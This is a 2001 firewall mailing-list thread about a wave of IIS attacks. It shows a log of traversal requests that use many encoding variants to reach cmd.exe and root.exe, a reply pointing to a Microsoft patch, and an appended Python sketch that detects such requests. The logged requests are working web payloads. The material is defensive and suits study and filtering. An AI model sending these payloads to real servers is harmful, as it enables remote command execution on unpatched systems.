
RE: [FW1] New worm on the road?



-----Original Message-----
From: Allison, Mark [mailto:[email protected]]
Sent: Wednesday, September 19, 2001 11:05 AM
To: 'Patrick Coomans'
Cc: '[email protected]'
Subject: RE: [FW1] New worm on the road?

A patch was released from Microsoft in October 2000.  Follow the Symantec link below.

Mark Allison
Global Cash Access / Central Credit, L.L.C.
[702-855-3037      mailto:mallison@central-credit.net]

-----Original Message-----
From: Patrick Coomans [mailto:[email protected]]
Sent: Tuesday, September 18, 2001 2:36 PM
To: [email protected]
Subject: [FW1] New worm on the road?

Since this evening I am experiencing massive attacks on HTTP (IIS oriented I presume) from many different IP addresses.
 
They all look like:
 
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/root.exe?/c+dir HTTP/1.0
GET /MSADC/root.exe?/c+dir HTTP/1.0
GET /MSADC/root.exe?/c+dir HTTP/1.0
GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
 
Is anyone aware that this is some new kind of worm?
Now my FW1 question: can I create an HTTP resource (secure server) that blocks all requests that e.g. have a .EXE in it?  Or would that slow my FW1's down too much?
 
Any other suggestions for good products that can do HTTP content inspection and that cooperate or can co-exist with FW1?
 
 
Thanks,
Patrick
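
Added example, not part of the original thread: a filter that matches on the raw URI has to cope with the encoding variants in the request list above, so this sketch canonicalizes each request path first (repeated percent-decoding, then folding the invalid C0/C1 two-byte sequences) and only then checks for traversal and for cmd.exe/root.exe. The function names and reason labels are hypothetical, the last sample line is constructed for contrast, and the overlong folding is a simplified model of a lenient decoder.

```python
import re
from urllib.parse import unquote_to_bytes

# Request lines copied from the message above (one per encoding variant).
SAMPLE_REQUESTS = [
    "GET /scripts/root.exe?/c+dir HTTP/1.0",
    "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /index.html HTTP/1.0",  # constructed benign request for contrast
]

OVERLONG = re.compile(rb"[\xc0\xc1](.)", re.S)   # lead bytes never valid in UTF-8
DOTDOT = re.compile(r"(^|/)\.\.(/|$)")
SHELL = re.compile(r"/(cmd|root)\.exe$", re.I)

def canonicalize(path, max_rounds=5):
    """Percent-decode until stable, then fold overlong 2-byte sequences.
    Returns (canonical_path, decode_rounds, saw_overlong)."""
    raw, rounds = path.encode("latin-1"), 0
    while rounds < max_rounds:
        decoded = unquote_to_bytes(raw)
        if decoded == raw:
            break
        raw, rounds = decoded, rounds + 1
    saw_overlong = bool(OVERLONG.search(raw))
    # Assumed lenient decoding: keep the low 5 bits of the lead, low 6 of the next byte.
    raw = OVERLONG.sub(
        lambda m: bytes([((m[0][0] & 0x1F) << 6) | (m[1][0] & 0x3F)]), raw)
    return raw.decode("latin-1").replace("\\", "/"), rounds, saw_overlong

def classify(request_line):
    """Return the reasons a request line is suspicious (empty list if none)."""
    target = request_line.split(" ")[1]
    path, rounds, overlong = canonicalize(target.split("?", 1)[0])
    reasons = []
    if rounds > 1:
        reasons.append("multi-encoded")
    if overlong:
        reasons.append("overlong-utf8")
    if DOTDOT.search(path):
        reasons.append("traversal")
    if SHELL.search(path):
        reasons.append("shell-binary")
    return reasons

if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        print(classify(line) or ["clean"], line)
```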
 







 